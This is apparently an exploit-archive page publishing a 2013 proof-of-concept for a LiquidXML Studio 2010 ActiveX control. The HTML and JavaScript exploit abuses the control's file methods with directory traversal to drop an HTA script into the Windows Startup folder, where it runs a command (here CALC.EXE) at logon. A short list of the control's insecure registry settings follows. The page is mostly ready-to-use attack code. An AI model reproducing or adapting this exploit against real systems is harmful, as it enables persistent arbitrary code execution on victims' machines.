[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : LiquidXML Studio 2010 ActiveX Remote 0-day
# Published : 2013-03-25
# Author :
# Previous Title : LiquidXML Studio 2012 ActiveX Insecure Method Executable File Creation 0-day
# Next Title : Photodex ProShow Producer v5.0.3310 ScsiAccess - Local Privilege Escalation


<html>
<object classid='clsid:E68E401C-7DB0-4F3A-88E1-159882468A79' id='target'/></object>
<script>
var sofa = "..\..\..\..\..\..\..\..\..\Documents and Settings\All Users\Start Menu\Programs\Startup\the_doctor_is_in.hta";
var king = "Oh noz, Look what Dr_IDE did...<" + "SCRIPT> var x=new ActiveXObject("WScript.Shell"); x.Exec("CALC.EXE"); <" +"/SCRIPT>";
target.OpenFile(sofa,1);
target.AppendString(king);
</script>
<body>
LiquidXML Studio 2010 ActiveX Insecure Method Executable File Creation 0-day<br>
By: Dr_IDE<br>
GUID: {E68E401C-7DB0-4F3A-88E1-159882468A79}<br>
Number of Interfaces: 1<br>
Default Interface: _FtpLibrary<br>
RegKey Safe for Script: False<br>
RegkeySafe for Init: False<br>
KillBitSet: False<br>
<br>
<br>
<br>
Been sitting on this one so long it could've hatched twice.
</body>
</html>